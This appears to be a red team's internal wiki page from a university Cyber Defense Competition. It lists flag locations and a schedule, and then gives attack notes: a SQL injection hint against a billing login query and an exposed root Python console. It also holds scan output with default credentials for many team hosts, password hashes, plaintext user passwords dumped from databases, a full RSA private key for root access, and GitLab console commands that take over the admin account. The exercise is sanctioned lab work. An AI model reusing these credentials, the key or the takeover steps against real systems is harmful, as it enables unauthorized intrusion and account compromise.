Red Wiki

Thanks for attending the CDC!
Competition Information
Flag Locations

phpBB Forum

BLUE FLAG

1) Dev Talk Forum
2) If Windows:
C:\
    If Linux/Unix: /etc/

RED FLAG (Announcements forum/thread)

1) Announcements forum/thread
2) If Windows:
C:\Windows\System32\
    If Linux/Unix: /root/


Game Box

BLUE FLAG

1) C:\Users\admin

RED FLAG

1) C:\Windows\System32\


Git Server

BLUE FLAG

1) /etc/

RED FLAG

1) /root
2) Set a "Broadcast Message" in Gitlab


Billing/DRM

BLUE FLAG

1) /etc/

RED FLAG

1) /root/
2) Extra line in: /var/www/isedrm/credit_cards.txt


Team Wiki Pages

Team 1:    None

Team 2:    None

Team 3:    None

Team 5:    None

Team 7:    None

Team 8:    None

Team 9:    None

Team 10:    None

Team 11:    None

Team 12:    None

Team 13:    None

Team 14:    None

Team 15:    None

Team 16:    None

Team 17:    None

Team 18:    None

Team 20:    None

Team 21:    None

Team 22:    None

Team 23:    None

Team 24:    None

Team 25:    None

Team 26:    None

Team 27:    None

Team 28:    None

Team 29:    None

Team 30:    None

Team 31:    None

Team 32:    None

Team 40:    ISEAGE

General Help and Information

Video of console MSF exploit: https://www.youtube.com/watch?v=n_79Ni8l0mc


Schedule

Time    Event
1100    Fire drill
1300    Begin Red evaluations
1400    Attack phase ends
1430    Red Team Debrief
1500    Begin awards ceremony
1600    Ceremony over, head home

Billing Box

"SELECT * from users where Username='" + username + "' and Password='" + password + "'"

Likely vulnerable to SQLi, use a ' as password and you'll get the error.

Generic vulnerabilities

root python shell at /console on billing app
Affected teams:
found billing.team10.isucdc.com
found billing.team8.isucdc.com
found billing.team11.isucdc.com
found billing.team12.isucdc.com
found billing.team13.isucdc.com
found billing.team16.isucdc.com
found billing.team15.isucdc.com
found billing.team19.isucdc.com
found billing.team21.isucdc.com
found billing.team24.isucdc.com
found billing.team22.isucdc.com
found billing.team25.isucdc.com
found billing.team28.isucdc.com
found billing.team29.isucdc.com
found billing.team32.isucdc.com
found billing.team26.isucdc.com




[+] 168.84.5.30:5900      - 168.84.5.30:5900 - Login Successful: :cdc

[*] Login found on billing.team1.isucdc.com -> cdc:cdc <- SUDO RIGHTS!!!
[*] Login found on billing.team2.isucdc.com -> cdc:cdc <- SUDO RIGHTS!!!
[*] Login found on billing.team1.isucdc.com -> cdc:cdcdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team2.isucdc.com -> cdc:cdcdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team1.isucdc.com -> cdc:cdccdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team2.isucdc.com -> cdc:cdccdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team9.isucdc.com -> cdc:cdc <- SUDO RIGHTS!!!
[*] Login found on billing.team9.isucdc.com -> cdc:cdcdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team9.isucdc.com -> cdc:cdccdccdc <- SUDO RIGHTS!!!
[*] Login found on forum.team10.isucdc.com -> cdc:cdc
[*] Login found on billing.team12.isucdc.com -> root:cdc <- ROOT PASSWORD!!!
[*] Login found on billing.team12.isucdc.com -> cdc:cdc <- SUDO RIGHTS!!!
[*] Login found on billing.team12.isucdc.com -> cdc:cdcdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team12.isucdc.com -> cdc:cdccdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team16.isucdc.com -> root:cdc <- ROOT PASSWORD!!!
[*] Login found on billing.team19.isucdc.com -> root:cdc <- ROOT PASSWORD!!!
[*] Login found on billing.team19.isucdc.com -> cdc:cdc <- SUDO RIGHTS!!!
[*] Login found on billing.team19.isucdc.com -> cdc:cdcdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team19.isucdc.com -> cdc:cdccdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team23.isucdc.com -> cdc:cdc <- SUDO RIGHTS!!!
[*] Login found on billing.team23.isucdc.com -> cdc:cdcdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team23.isucdc.com -> cdc:cdccdccdc <- SUDO RIGHTS!!!
[*] Login found on billing.team30.isucdc.com -> cdc:cdc <- SUDO RIGHTS!!!

[+] 1/git.team1.isucdc.com:22/Git SSH: root:cdc
[+] 1/billing.team1.isucdc.com:22/Billing SSH: cdc:cdc
[+] 2/git.team2.isucdc.com:22/Git SSH: root:cdc,cdc:cdc
[+] 2/billing.team2.isucdc.com:22/Billing SSH: cdc:cdc
[+] 8/git.team8.isucdc.com:22/Git: cdc:cdc
[+] 9/git.team9.isucdc.com:22/Git SSH: cdc:cdc
[+] 9/billing.team9.isucdc.com:22/Billing SSH: cdc:cdc
[+] 10/git.team10.isucdc.com:22/Git SSH: root:cdc,cdc:cdc
[+] 10/forum.team10.isucdc.com:22/Forum Remote Admin: cdc:cdc
[+] 11/git.team11.isucdc.com:22/Git SSH: cdc:cdc
[+] 12/git.team12.isucdc.com:22/Git SSH: root:cdc,cdc:cdc
[+] 12/billing.team12.isucdc.com:22/Billing SSH: root:cdc,cdc:cdc
[+] 16/git.team16.isucdc.com:22/Git SSH: root:cdc,cdc:cdc
[+] 19/git.team19.isucdc.com:22/Git SSH: root:cdc,cdc:cdc
[+] 19/billing.team19.isucdc.com:22/Billing SSH: root:cdc,cdc:cdc
[+] 21/git.team21.isucdc.com:22/Git SSH: cdc:cdc
[+] 23/git.team23.isucdc.com:22/Git SSH: cdc:cdc
[+] 23/billing.team23.isucdc.com:22/Billing SSH: cdc:cdc
[+] 26/git.team26.isucdc.com:22/Git SSH: cdc:cdc
[+] 30/billing.team30.isucdc.com:22/Billing SSH: cdc:cdc
[+] 32/git.team32.isucdc.com:22/Git SSH: cdc:cdc

team30 hashes
blue:$1$S/NspQTA$xgSBjTocjASGNwfGry349.:1001:1001::/home/blue:/bin/bash
red:$1$UtZW/xSL$AuHpTV10KI24XNMPK7qfr/:1002:1002::/home/red:/bin/bash
green:$1$y73mEjuf$zxEZP37M80wU5oL8Ej4gB/:1003:1003::/home/green:/bin/bash
yellow:$1$AuL1FLef$r4KmAxQxBGeNLqV3EM9/x1:1004:1004::/home/yellow:/bin/bash
black:$1$qoNoaxtE$asmdSjyokzANAVaN7JDiQ1:1005:1005::/home/black:/bin/bash
brown:$1$OKonYUQT$3mxHv6Zoc9O6lE7ERtWak0:1006:1006::/home/brown:/bin/bash
purple:$1$Z0PQzXCA$/a0BBdRP2kr836lRtQvj1/:1007:1007::/home/purple:/bin/bash
oranage:!!:1008:1008::/home/oranage:/bin/bash
kfrancis:$1$weaiVuOv$LOSpJ0G1.1la/5pxQxv3B/:1009:1009::/home/kfrancis:/bin/bash
jbarnes:$1$P77j6LHS$oAmuyyRH6gSQGcH7E6rBK0:1010:1010::/home/jbarnes:/bin/bash

usernames not found in the thingy above ^ (found on team 9's boxes with no passwords)
aray
pkelly
kboyd
gbaker
lbriggs:$1$uFhncasO$m2UIZlmXmsDDFLMkoaTDz0:1011:1012:Levi Briggs:/home/lbriggs:/bin/bash
cdouglas:$1$LKu/rsm5$pkBDvLWsoLK3mk3WTiO.o.:1012:1013:Clara Douglas:/home/cdouglas:/bin/bash


git.team32, billing.team30, git.team26 - Root Private key:

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA2VpI0Xid0iUCo+o3b369WVW0Oy4JQJHcgqOeP3EDKmwifSKS
1+Bnn94yO7JpouBS4UbcT2UTAz8A/4bp+3Bzvkv8Xzd15ikrgVu2LcY8vrZeDv0k
h9hZA63ydlB5d6SBPWqRXFNvvwwFY5/UanF9EKiQu7jv+H3kCseA36ZhTfD2XhQY
jH1fNllkFvb5IQzdy8dCPVSXQxAHyfr9Xn/W5Y61yKkCby2RvWDcopfio6M6H9MW
GNv5+MQZT+7pbSF6A8f/DnqoD3i5iXG5V2/eOzIVfluD7eki/mXzObmtZyWCDFes
s4STaZec9qPqe3/sUC7bdWs+RZiMxS7nLXqVDQIDAQABAoIBAQDA+fsLGEcvTDLi
69HaSTG+fmxt2rrWPGsHBlQ7SZCg+q9IYQj1aEU42KPLAuXtebO8VhjG2RufVzIA
rX1TBA2PmJFyzJ/+APGigZXnYEmQngQ21KS5g+nMbYWHbH3cLw+cQuDaky309qxW
PpLvCuIahz8xnMpa2xM8StNuPp/H/RUPh8zp+o30AFgOKQN7VhKdKE6zm5vwaRkq
/r651oBonRfy6f7wlnE7WmHDvFk/ZBiu2EX7eg4Q2A4SKp2QKQv1H0NbixgxXKag
eRAXQD36mF37aRRmc0Ws4Ho5z8220YDHWqd/FfZNl/k8DDgy0eloiXFM0mGKJCFd
b75G/051AoGBAPHxH8KV0M2zFWU9khu8TUB4rsAD5I/ReR3II3MaAwGL/M/g/ytc
vT9fHT3CnSPBwp0tX4iRANTQqr4u2W6MUVlzBCQR4XFwLc8U6RQjOXXEDJIKnsEY
vbbZZhDMuj38ixDOoriFA+opOeLIQaUvofAkRJ9ba4N9RmIeqKRaGzDjAoGBAOX7
ZZIqFNpFYkF5gjY3OAp0s0Y6LyZpl0JVVE0P4EkToIvZbTJSXQae/i06ZlROr96W
6K8ztX7Mka5lLrMh7u2oKUTH0Zz0gmP7C1ruy0bPIx4YS63D2YyxMmDaBRvAMBsI
BnvPPGCkapjNH8dAdn33gMtjB4mOsSODByc5QrVPAoGAes+uEoUf57qXCrwVVZTh
Fe/srLWNKN/o/hAgxoWWrwtTOmZ4wJcjzW5HlpkaURNC6awliVoptN1zPnTjlDUP
+jrjCDg3WvDZn/t6UOmMelYZF2zipxwa+R0jrTVu+JYgNVjeypFiqlNg+dgzUll6
dz7Bwq6SRb2qo5XyfvLqSIcCgYEAiq/Uq5UG6C2JOBSvSkR4Xg3MAmCaCF8KoSzV
3nbheRAF8+/VItB6WsDMZLff951P/zof7W+QVnvEqldIFywyakzLPjgFltH4Q5Sj
X127ZeMJuV9LW+lMKsS8rZ0sEXUPTW3EgysQrPLZeXXRYRXlnsb/eycn53MOLW0Z
hjTIno8CgYAJWJCx9eIEsh8lJaqA+UbwGhQfT6Aj3d6DiOb/m2i4L3aHJVSYYsXH
9dBlp22UyAhbFuJxs1osiGBsPPEDtb+OdZhRUifz6C66n+j3CeQqrLTdaH5Z6LT8
iHIGH12d81QiewNii8KTWu18O3xTKGYVrA7IhuFjs4vwvy6kyS+kvQ==
-----END RSA PRIVATE KEY-----

*anonymous FTP on forum servers (at least team 9)

Team 8 billing users:
select * from users;
+----------+-------------+-----------+-----------+
| username | password    | highscore | purchased |
+----------+-------------+-----------+-----------+
| cdc      | cdc         |        30 | True      |
| pkelly   | obsidian12  |         0 | True      |
| kboyd    | saxophone88 |         0 | True      |
| gbaker   | Hzfgqaq1    |         0 | True      |
+----------+-------------+-----------+-----------+
 Team 15 billing users;
select * from users;
+----------+------------+-----------+-----------+
| username | password   | highscore | purchased |
+----------+------------+-----------+-----------+
| cdc      | cdc        |        30 | True      |
| kfrancis | zih20kan   |         0 | True      |
| pkelly   | obsidian12 |         0 | 1         |
+----------+------------+-----------+-----------+


As root on gitlab:

gitlab-rails console production

***Wait for console***

user = User.find(1)
user.password = 'cdc_red_team'
user.password_confirmation = 'cdc_red_team'
user.unlock_access!
user.save

BroadcastMessage.create!(message: '', starts_at: Time.now, ends_at: Time.now + 5.minutes)